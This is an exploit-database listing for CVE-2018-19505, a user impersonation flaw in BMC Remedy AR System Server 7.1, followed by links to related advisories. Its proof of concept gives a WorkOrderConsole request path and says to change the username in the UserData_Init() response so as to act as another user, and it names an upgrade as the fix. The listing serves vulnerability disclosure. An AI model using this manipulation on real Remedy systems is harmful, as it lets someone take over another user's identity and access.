Lucene search
Rafael Pedrero1337DAY-ID-31687HistoryNov 28, 2018 - 12:00 a.m.
BMC Remedy 7.1 User Impersonation Vulnerability
2018-11-2800:00:00
Rafael Pedrero
0day.today
25
0.001 Low
EPSS
Percentile
39.6%
Exploit for jsp platform in category web applications
<!--
# Exploit Title: Impersonation may lead to incorrect user context in Remedy
AR System Server in BMC Remedy 7.1
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.bmc.com/
# Software Link: http://www.bmc.com/
# Version: Impersonation may lead to incorrect user context in Remedy AR
System Server in BMC Remedy 7.1
# Tested on: all
# CVE : CVE-2018-19505
# Category: webapps
1. Description
Remedy AR System Server in BMC Remedy 7.1 may fail to set the correct user
context in certain impersonation scenarios, which can allow a user to act
with the identity of a different user.
2. Proof of Concept
Impersonation may lead to incorrect user context in Remedy AR System Server
in BMC Remedy 7.1.
Go to WorkOrderConsole:
In Request:
/WOI:WorkOrderConsole/Default+User+View+(Support)/userdata.js?winname=SERVERWOIWOI+WORKOrderConsole12345643244
(last values can change)
In response change the user value in function
UserData_Init(){ARKWSetup(2,"USERNAME_TO_CHANGE","....more values).
3. Solution:
Update to the latests version Remedy AR System Server in BMC Remedy 8.1.
# 0day.today [2019-02-25] #Related
checkpoint_advisories
checkpoint_advisories
BMC Remedy Privilege Escalation (CVE-2018-19505)
2018-12-06 00:00:00
prion
prion
Code injection
2019-01-03 19:29:00
cvelist
cvelist
CVE-2018-19505
2019-01-03 19:00:00
cve
cve
CVE-2018-19505
2019-01-03 19:29:00
nvd
nvd
CVE-2018-19505
2019-01-03 19:29:00
packetstorm
packetstorm
BMC Remedy 7.1 User Impersonation
2018-11-28 00:00:00